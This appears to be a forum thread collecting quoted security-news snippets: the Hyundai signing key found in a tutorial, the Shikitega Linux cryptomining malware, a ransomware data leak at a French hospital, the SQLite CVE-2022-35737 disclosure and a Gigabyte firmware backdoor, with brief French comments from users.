In which a blogger finds the private key used to sign Hyundai car software updates … by googling it. They used a key pair from a popular tutorial. 😂😂😂 pic.twitter.com/ydoWfjbvsR
— Daniel Feldman (@d_feldman) August 13, 2022
New Linux Cryptomining Malware :
The malware was dubbed “Shikitega” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that’s just 370 bytes.
Shikitega also downloads Mettle, a Metasploit interpreter that gives the attacker the ability to control attached webcams and includes a sniffer, multiple reverse shells, process control, shell command execution and additional abilities to control the affected system.
[…]
The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available.
Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name. “Without [a] domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time,” AT&T said.
Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.
Le groupe hackers qui a orchestré une cyberattaque contre le centre hospitalier sud francilien de Corbeil-Essonnes, a commencé vendredi à diffuser des données, l'hôpital ayant refusé de payer la rançon demandée, a appris l'AFP dimanche de source proche du dossier.
Les hackers avaient fixé un ultimatum à l'hôpital pour payer la rançon au 23 septembre. Le délai expiré, ils ont diffusé une série de données, a ajouté la source proche du dossier. Ces données "semblent concerner nos usagers, notre personnel ainsi que nos partenaires". Parmi elles figurent "certaines données administratives", dont le numéro de sécurité sociale, et "certaines données santé telles que des comptes-rendus d'examen et en particulier des dossiers externes d'anatomocytopathologie, de radiologie, laboratoires d'analyse, médecins", a poursuivi le centre hospitalier.
Trail of Bits disclosed today CVE-2022-35737, an arbitrary code execution in SQLite
— Catalin Cimpanu (@campuscodi) October 25, 2022
The vulnerability affects all SQLite versions released in the past 22 years (and 19 days)https://t.co/w0ShgtEZw7 pic.twitter.com/l2Y7kdl12L
Godzil (./1940) :Plei mn de trucs tout court, même.
Interessant ya plein de trucs fermé qui utilisent SQLite......
Godzil (./1940) :
Interessant ya plein de trucs fermé qui utilisent SQLite......
Our follow-up analysis discovered that firmware in Gigabyte systems is dropping and executing a Windows native executable during the system startup process, and this executable then downloads and executes additional payloads insecurely. It uses the same techniques as other OEM backdoor-like features like Computrace backdoor (a.k.a. LoJack DoubleAgent) abused by threat actors and even firmware implants such as Sednit LoJax, MosaicRegressor, Vector-EDK. Subsequent analysis showed that this same code is present in hundreds of models of Gigabyte PCs. We are working with Gigabyte to address this insecure implementation of their app center capability.Prétendre que je suis surpris serait un mensonge.
In the interest of protecting organizations from malicious actors, we are also publicly disclosing this information and defensive strategies on a more accelerated timeline than a typical vulnerability disclosure. This backdoor appears to be implementing intentional functionality and would require a firmware update to completely remove it from affected systems. While our ongoing investigation has not confirmed exploitation by a specific threat actor, an active widespread backdoor that is difficult to remove poses a supply chain risk for organizations with Gigabyte systems.